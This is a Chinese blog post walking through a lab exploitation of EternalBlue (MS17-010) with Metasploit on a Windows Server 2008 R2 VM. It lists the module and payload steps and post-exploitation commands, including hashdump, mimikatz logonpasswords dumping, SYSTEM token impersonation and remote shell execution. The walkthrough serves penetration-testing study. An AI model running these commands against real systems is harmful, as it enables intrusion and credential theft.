【漏洞工具】Metasploit框架永恒之蓝

最新推荐文章于 2024-05-29 17:52:29 发布
最新推荐文章于 2024-05-29 17:52:29 发布
阅读量341 收藏
点赞数
分类专栏: 技术学习 渗透测试 文章标签: linux 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_35938621/article/details/118055835
版权

MSF - 永恒之蓝ms17漏洞利用

  • 环境:windows server 2008 R2

  • 第一步、搜索ms17-010的漏洞辅助扫描工具

    • image-20210618082235168

  • 第二步、use该辅助模块

    • image-20210618082325376

  • 第三步、设置攻击参数,Rhost这是攻击主机的ip地址,永恒之蓝就是攻击445端口

    • image-20210618082527325
    • image-20210618082600801

  • 第四步、搜索exploit关于ms17-010,然后找到永恒之蓝

    • image-20210618082739059
    • image-20210618082904198

  • 第五步、找payload,windows反连payload 也就是windows/meterpreter/reverse_tcp

    • image-20210618083429422

    • image-20210618083601528

    • 第一次尝试,虚拟机挂了

    • image-20210618130220362

    • image-20210618085119005

    • 第二次尝试成功

    • image-20210618115140048

  • 建议会话之后的命令使用

    • getlwd – 显示本地工作目录

      • image-20210618200541943

    • ipconfig --显示网络接口信息

      • image-20210618200657205

    • ps --列出正在运行的程序

      • image-20210618200717296

    • migrate – 根据ps查看的pid可以任意迁移平行权限和下行权限

      • image-20210618200829834
      • image-20210618200937038
      • sysinfo --获取远程系统有关信息
        • image-20210618201053573
      • 提权和密码命令
        • getsystem(尝试简单提权)
          • image-20210618201334096
        • hashdump(获取hash密码)
          • image-20210618201408765
      • screenshot (获取远程桌面图片)
        • image-20210618201723492
        • image-20210618201749166

    • shell(感觉比较实用的一个了)

      • image-20210618201834813
      • image-20210618201936506

  • mimikatz(被换了个名字kiwi)抓取管理员账号和密码方式

    • load -l (查看可用模块)

      • image-20210618202215220

    • image-20210618202236991

    • 使用命令(kiwi_cmd sekurlsa::logonpasswords)

      • image-20210618202635214
      • image-20210618202739496

  • 远程CMD命令执行

    • execute -f cmd -c
    • image-20210619165901762
    • image-20210619165918970

  • 木马模式调到后台执行

    • background

  • 木马调回前台

    • session -l

      • image-20210619170225259

  • 令牌操纵

  • use incognito #heip incognito 查看帮助

    • image-20210619170849281

  • list_tokens -u 查看可用的token

    • image-20210619170901610

  • impersonate_token “伪造的身份” #假冒token 或者

    • 举个例子:impersonate_token NT AUTHORITY\SYSTEM #不加单引号 需使用\

  • execute -f cmd.exe -i –t # -t 使用假冒的token 执行 或者直接shell

    • image-20210619171137897

  • 登陆靶机电脑

    rdesktop -u 用户名 -p 密码 登陆ip地址
    • image-20210619171255577
    • image-20210619171334541
孤桜懶契
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
永恒之蓝(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之蓝漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
永恒之蓝测试.docx
07-23
永恒之蓝是 Windows 操作系统中的一个漏洞,通过这个漏洞,可以远程控制目标主机。 Nmap 扫描 首先,我们需要使用 Nmap 工具来扫描目标主机的开放端口和服务。命令为:`nmap –Pn –Sv –T4 IP 地址`,其中 `-Pn` ...
渗透测试工具-Metasploit使用复现永恒之蓝漏洞
weixin_53440207的博客
02-23 1047
metasploit使用以及复现永恒之蓝漏洞
kali渗透测试——渗透攻击(基础+攻击永恒之蓝操作系统)
2302_80189643的博客
05-29 293
使用auxiliary/scanner/smb/smb_ms17_010模块加载检测,set rhosts设置目标主机,run执行,search搜索ms17_010漏洞的渗透模块。使用编号为0的模块,加上use启动模块,然后使用show options命令查看这个模块需要设置的参数。(4)Check是检查,表示该漏洞利用模块是否包含检测功能,用于验证目标系统是否存在该漏洞。(5)Description是描述,对漏洞利用模块的功能、目标、影响等信息简要描述。(2)模块命令(Module Command)
Metasploit(MSF)使用详解—以kali系统环境下永恒之蓝(ms17_010)为例
weoptions的博客
09-21 4556
Metasploit是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。我们接下来以大名鼎鼎的永恒之蓝MS17_010漏洞为切入点,讲解MSF框架的使用。
【ms17-010】永恒之蓝漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1795
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用。
Metasploit学习笔记(二)——永恒之蓝MS17-010漏洞复现
Zichel77的博客
10-06 2492
发现445端口打开,SMB漏洞MS17-010(永恒之蓝)正是基于445端口进行传播,因此可以加以利用。这里有各种MS17-010漏洞版本,我们根据目标系统选择编号为3的版本。Windows下IP地址为192.168.92.136。就可以看到windows7电脑中新建了这么个文件。看到WIN才说明利用成功,FAIL就是失败。使用的是nmap模块,输入命令进行扫描。开启了两台虚拟机,保证在同一网段下。两台虚拟机在同一网段,故可保持通信。我没这个病毒就不传了哈哈哈哈哈。
小计一次永恒之蓝实战
08-20
永恒之蓝(EternalBlue)是一种针对Windows系统中Server Message Block (SMB) v1协议的远程代码执行漏洞(CVE-2017-0143),该漏洞允许攻击者在未授权的情况下向易受攻击的系统发送恶意数据包,从而在目标系统上执行...
渗透基础笔记+作业(永恒之蓝复现)
09-08
工具如Nmap用于网络扫描,Metasploit则作为渗透框架,利用已知漏洞进行攻击。在复现过程中,测试者会模拟攻击流程,以理解漏洞的利用方式和防范措施。 总结起来,渗透测试是一个综合性的过程,涵盖了情报收集、威胁...
永恒之蓝复现kaliwin7
最新发布
07-19
4. **打开 Metasploit 并搜索“永恒之蓝漏洞**: - 命令:`search eternalblue` - 解析:搜索与“永恒之蓝”相关的模块,包括攻击模块和扫描模块。 5. **利用扫描模块进行扫描**: - 选择模块:`use auxiliary...
0x20.第二十课 MetaSploit检测并复现永恒之蓝.pdf
06-24
本课程主要介绍如何使用MetaSploit框架来检测和复现著名的“永恒之蓝”(EternalBlue)漏洞。该漏洞是微软在2017年发布的MS17-010安全更新中修复的一个严重漏洞。该漏洞允许攻击者通过向目标系统的Microsoft服务器...
永恒之蓝漏洞检测工具
10-10
永恒之蓝漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,及时更新,以免勒索病毒入侵。
使用Kali Linux Metasploit复现永恒之蓝
xujing19920814的博客
10-01 5412
使用Kali Linux Metasploit复现永恒之蓝
网络渗透系列(三)Kali渗透工具- metasploit利用永恒之蓝漏洞攻击Windows系统全流程(全程干货、火爆连载更新中...)
Midheart1的博客
12-29 825
永恒之蓝漏洞Windows10及之前的系统都存在永恒之蓝漏洞,有很多业界大佬纷纷提出过这个事情,所以永恒之蓝这个经典案例依然值得学习和深入开发。
永恒之蓝(MS17-010)漏洞复现
tubug的博客
05-21 5695
2017 年 4 月 14 日晚,黑客团体 Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝工具,“永恒之蓝”利用 Windows 系统的 SMB 漏洞可以获取系统最高权限。5 月 12 日,不法分子通过改造“永恒之蓝”制作了 wannacry 勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网呾政府机构与网中招,被勒索支付高额赎金才能解密恢复文件。.........
Metasploit(MSF)使用教程(以ms17_010永恒之蓝为例)
天乐的博客
03-12 1372
Windows Vista、Windows 7、Windows 8.1、Windows 10、Windows Server 2008、Windows Server 2012和Windows Server 2016等,利用SMB协议(特别是SMBv1)的漏洞,需要目标系统开放了139或445端口。到此本文就结束了,本文仅介绍Metasploit的简单入门,更多功能自行学习探索,相信你会掌握这一款强大的渗透测试扫描神器,禁止非法扫描,后果自负。1.启动kali的nmap,探测一下靶标的455端口开放情况。
nmap、X-Scan漏洞扫描和Metasploit中用永恒之蓝漏洞入侵靶机并上传冰河
m0_59302403的博客
03-22 3465
利用nmap、X-Scan扫描靶机的漏洞,在Metasploit中用扫描出的永恒之蓝漏洞入侵靶机,建立连接后上传冰河木马控制靶机,最后用冰河陷阱清除靶机的冰河木马,记一次完整的入侵控制实验。
Kali--MSF-永恒之蓝详解(复现、演示、远程、后门、加壳、修复)
xnxqwzy的博客
02-23 3274
永恒之蓝(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之蓝”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
msfconsole扫描永恒之蓝漏洞
09-06
你可以使用 Metasploit 框架中的 `msfconsole` 命令进行永恒之蓝漏洞的扫描。请确保你已经正确安装了 Metasploit 框架,并且了解其基本用法。 在打开的终端中输入 `msfconsole` 来启动 Metasploit 框架控制台。然后...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

孤桜懶契

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值